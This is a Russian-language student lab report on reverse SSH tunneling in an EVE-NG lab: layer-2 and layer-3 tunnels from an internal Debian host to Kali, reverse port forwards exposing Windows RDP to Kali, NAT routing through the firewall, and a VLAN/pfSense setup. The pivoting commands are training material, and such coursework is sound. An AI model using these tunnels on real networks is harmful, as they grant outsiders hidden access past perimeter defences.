# **Практика №4. Revers Shells & Reverse SSH connections** # **Задание к практической работе №4** - Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать) - Настроить каждое устройство в соответсвии со следующими параметрами: - Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP - устройство RPi-4 - использовать как “мостовое” устройство (необходимо для SSH tunneling L2) # **Инфраструктура организации:** - Kali-2021 - Linux Kali 2021 (2CPU, 2GB RAM) - FW-pfsense - PfSense Firewall 2.5.2, default config (Qemu version 4.1.0, 2CPU, 2GB RAM) - Switch - Cisco IOL-L2 (2 port-groups) - Debian-RPi4 - Linux Debian 10 (1CPU, 1GB RAM) - Win-10 - Windows 10 (full) (2CPU, 2GB RAM) - Win-7 - Windows 7 (full) (QEMU 2.12, 4CPU, 4GB RAM) - Network: - Pfsense Default config (WAN-DHCP, LAN - static IP) - Internet - Cloud-1 - VLAN-10 - 172.16.10.0/24, GW 172.16.10.254 - VLAN-10 - 172.16.20.0/24, GW 172.16.20.254 # **Выполнение задания** ![](https://i.imgur.com/RnJk3yP.png) # **SSH Tunneling L2** На **Debian** прописываем следующие команды для дальнейшей работы: ``` apt update apt install bridge-utils ``` Редактируем и объединяем в мост на **Debian**: ``` nano /etc/network/interfaces/ ``` ![](https://i.imgur.com/oyXoH20.png) Проверяем ip a: ![](https://i.imgur.com/62QQsOY.png) Проверяем ip на windows машинках: Windows 10: ![](https://i.imgur.com/P1nQMlR.png) Windows 7: ![](https://i.imgur.com/gzOIMMC.png) Kali: ![](https://i.imgur.com/INDdgW2.png) Далее на Kali настраиваем конфиг: ``` sudo nano /etc/ssh/sshd_config ``` Разрешаем root-вход `PermitRootLogin yes` Включаем `PermitTunnel` Затем переходим на **Debian** и подключаемся к машинке командой ``` sudo ssh root@192.168.124.154 -o Tunnel=ethernet -w any:any ^Ip берем с нашего Kali ``` ![](https://i.imgur.com/wzR2aV5.png) Перейдем в **Kali** и увидим, что у нас создался интерфейс tap0: ![](https://i.imgur.com/caKgWLC.png) На Debian открыв новое окно `Alt + F2` введем `ip a` и убедимся, что создался интерфейс tap0: ![](https://i.imgur.com/Y7eIOgb.png) Посмотрим все доступные сетевые мосты `brctl show`. А затем добавим виртуальный сетевой интерфейс tap0 в мост `br0 brctl addif br0 tap0` и снова посмотрим сетевые мосты: ![](https://i.imgur.com/PAk3HZ2.png) Командой `ip link set dev tap0 up` поднимем интерфейс tap0 в **Debian** и **Kali** ![](https://i.imgur.com/U8I8ktQ.png) ![](https://i.imgur.com/yfUzM1n.png) ![](https://i.imgur.com/lHiotSu.png) Захватим пакеты, которые передаются через виртуальный интерфейс tap0 командой `tcpdump -i tap0` ![](https://i.imgur.com/ovbdiBg.png) Получим ip адрес по dhcp на интерфейс tap0:![](https://i.imgur.com/Ot8nfrQ.png) Для проверки зайдем по адресу 192.168.1.1 в браузере(успешный успех, можем зайти в наш FW): ![](https://i.imgur.com/duHlPoQ.png) # **SSH port forwarding** Узнаем ip на **Kali** ![](https://i.imgur.com/b7acF88.png) В windows 10 подключаемся к Kali по ssh: ``` ssh user@192.168.124.156 ``` Не забыв перед этим включить ssh на Kali: ``` sudo service ssh start ``` ![](https://i.imgur.com/ywyoNIi.png) Теперь, открыв второй терминал, нам необходимо снова подключиться к Kali `ssh -R 3395:localhost:3389 user@192.168.124.156` - создаем удаленный туннель SSH между локальным компьютером и удаленным сервером Kali, который перенаправляет трафик из локального порта 3395 на удаленный 3389: ![](https://i.imgur.com/yuhrqFS.png) В Kali проверим пролушиваемын порты и находим наш порт 3395:![](https://i.imgur.com/o1IPA2e.png) Теперь с помощью команды `xfreerdp /u:user /p:eve@123 /v:127.0.01:3395` подключаемся к удаленном рабочему столу Windows 10:![](https://i.imgur.com/GWonj7e.png) Теперь подключимся к Windows 7 через Debian: ip адрес win-7: ![](https://i.imgur.com/YslkH3s.png) Команда Debian, где первый ip win-7, а второй Kali `ssh -R 3395:192.168.1.116:3389 user@192.168.124.157` ![](https://i.imgur.com/tgjdXpG.png) Потом на Kali: ``` xfreerdp /u:user /p:eve@123 /v:127.0.0.1:3395 ``` ![](https://i.imgur.com/GuReb6A.png) # **SSH Tunneling L3** В Debian вводим команду `ssh -w 0:0 root@192.168.124.159` для создания tun интерфейса между Debian и Kali ![](https://i.imgur.com/fUMPFTM.png) ![](https://i.imgur.com/QFThVUH.png) На Kali ![](https://i.imgur.com/873vZTL.png) Назначаем адрес tun0 ![](https://i.imgur.com/lW0Xrrx.png) Поднимаем интерфейс ![](https://i.imgur.com/Q7QI98R.png) Проверяем ![](https://i.imgur.com/aNGXH4z.png) В Debian делаем все то, что и на Kali: ![](https://i.imgur.com/3uXGYEf.png) ![](https://i.imgur.com/MeVuP6F.png) На Kali пингуем интерфейс tun0 Debian: ![](https://i.imgur.com/HGYUaYc.png) Далее на Debian переходим в конфиг: ``` nano /etc/sysctl.conf ``` и включаем `net.ipv4.ip_forward=1` ![](https://i.imgur.com/jzaXKgE.png) На Kali добавляем маршрутизацию `sudo ip route add 192.168.1.0/24 via 10.8.0.2` - все пакеты подсети(в которой Debian) должны быть отправлены чрез 10.8.0.2: ![](https://i.imgur.com/TfWXKlS.png) Пингуем Debian ![](https://i.imgur.com/fOXVX4X.png) В Debian необходимо изменить исходный адрес пакетов на адрес хоста, через который они отправляются ``` iptables -t nat -A POSTROUTING -o br0 -j MASQUERADE ``` ![](https://i.imgur.com/IghCrBH.png) В Kali пингуем pfsense ![](https://i.imgur.com/4Xk612B.png) Можем заходить без проблем на FW в бразуре Kali ![](https://i.imgur.com/BpGCJkj.png) # **VLAN Setting** Создаем вланы ``` en conf t vlan 10 name VLAN-10 vlan 20 name VLAN-20 ``` ![](https://i.imgur.com/jEKEBI3.png) Настраиваем интерфейсы ``` conf t int e0/1 description "WIN-10" switchport mode access switchport access vlan 20 int e0/2 description "WIN-7" switchport mode access switchport access vlan 10 int e0/0 switchport trunk encapsulation dot1q switchport mode trunk ``` ![](https://i.imgur.com/zv1GKHl.png) ![](https://i.imgur.com/0ApJsO6.png) Проверяем статус интерфейсов ![](https://i.imgur.com/HhvBjBF.png) вланов ![](https://i.imgur.com/J2V1saK.png) Настраиваем pfsense: ![](https://i.imgur.com/rgS2BX7.png) ![](https://i.imgur.com/4qFYZuM.png) Десятый влан: ![](https://i.imgur.com/9hDiovg.png) ![](https://i.imgur.com/0BMpWcD.png) Двадцатый влан: ![](https://i.imgur.com/iY2jTcL.png) ![](https://i.imgur.com/g6fjDDA.png) Services => DHCP Server ![](https://i.imgur.com/2HN2wti.png) ![](https://i.imgur.com/rUQn2vL.png) ![](https://i.imgur.com/xvcemxc.png) ![](https://i.imgur.com/DxVFJAP.png) FireWall => Rules ![](https://i.imgur.com/qvdwMEu.png) ![](https://i.imgur.com/E7utQRZ.png) Pfsense ![](https://i.imgur.com/kOL57yK.png) Полученные ip адреса на windows машинках: Windows10: ![](https://i.imgur.com/wnrJhPa.png) Windows7: ![](https://i.imgur.com/kRf3XqN.png)